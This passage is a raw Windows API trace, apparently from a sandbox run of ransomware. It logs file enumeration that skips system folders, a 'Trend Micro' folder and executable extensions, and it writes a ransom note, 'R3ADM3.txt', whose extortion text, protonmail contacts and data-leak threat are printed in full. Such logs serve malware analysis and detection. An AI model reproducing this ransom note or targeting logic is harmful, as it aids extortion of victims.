lpSrch="System Volume Information") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="Boot") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="Windows") returned="Windows NT" [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".UAKXC") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".exe") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".dll") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".lnk") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".sys") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch=".msi") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="R3ADM3.txt") returned 0x0 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.374] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.374] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.374] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0140.374] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0140.374] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0140.374] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.374] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0140.374] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1 [0140.374] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1 [0140.374] StrStrIW (lpFirst="WwanSvc", lpSrch="tmp") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="winnt") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="temp") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="thumb") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="$Recycle.Bin") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="System Volume Information") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="Boot") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="Windows") returned 0x0 [0140.375] StrStrIW (lpFirst="WwanSvc", lpSrch="Trend Micro") returned 0x0 [0140.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.375] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.375] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ce0 [0140.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0140.375] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.375] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0140.375] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcb28 | out: hHeap=0xea0000) returned 1 [0140.375] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0140.375] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.376] Sleep (dwMilliseconds=0x32) [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcb28 [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.479] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\R3ADM3.txt" (normalized: "c:\\programdata\\microsoft help\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.573] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.573] WriteFile (in: hFile=0x6c8, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.574] CloseHandle (hObject=0x6c8) returned 1 [0140.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.574] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x58fb68d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58fb68d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.656] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.656] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x58fb68d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58fb68d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.656] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.657] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.657] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0140.657] lstrcmpW (lpString1="Hx.hxn", lpString2=".") returned 1 [0140.657] lstrcmpW (lpString1="Hx.hxn", lpString2="..") returned 1 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".UAKXC") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".exe") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".dll") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".lnk") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".sys") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch=".msi") returned 0x0 [0140.657] StrStrIW (lpFirst="Hx.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec560 [0140.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0140.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0140.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0140.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.658] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0140.658] lstrcmpW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".") returned 1 [0140.658] lstrcmpW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="..") returned 1 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.658] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d30 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0140.659] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.659] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.659] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0140.659] lstrcmpW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.659] lstrcmpW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.659] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.659] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0140.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee9c8 [0140.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.660] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.660] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0140.660] lstrcmpW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".") returned 1 [0140.660] lstrcmpW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="..") returned 1 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.660] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.660] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0140.661] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0140.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.661] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.661] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0140.661] lstrcmpW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".") returned 1 [0140.661] lstrcmpW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="..") returned 1 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.661] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.662] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.662] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.662] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.662] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6cb8 [0140.662] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec98 [0140.662] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.662] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.662] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0140.662] lstrcmpW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".") returned 1 [0140.662] lstrcmpW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="..") returned 1 [0140.662] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.662] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.662] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.662] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.662] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.663] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.663] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.663] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.663] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.663] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0140.663] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee950 [0140.663] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.663] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.663] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0140.663] lstrcmpW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".") returned 1 [0140.663] lstrcmpW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="..") returned 1 [0140.663] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.663] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.664] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.664] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.664] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sys") returned 0x0 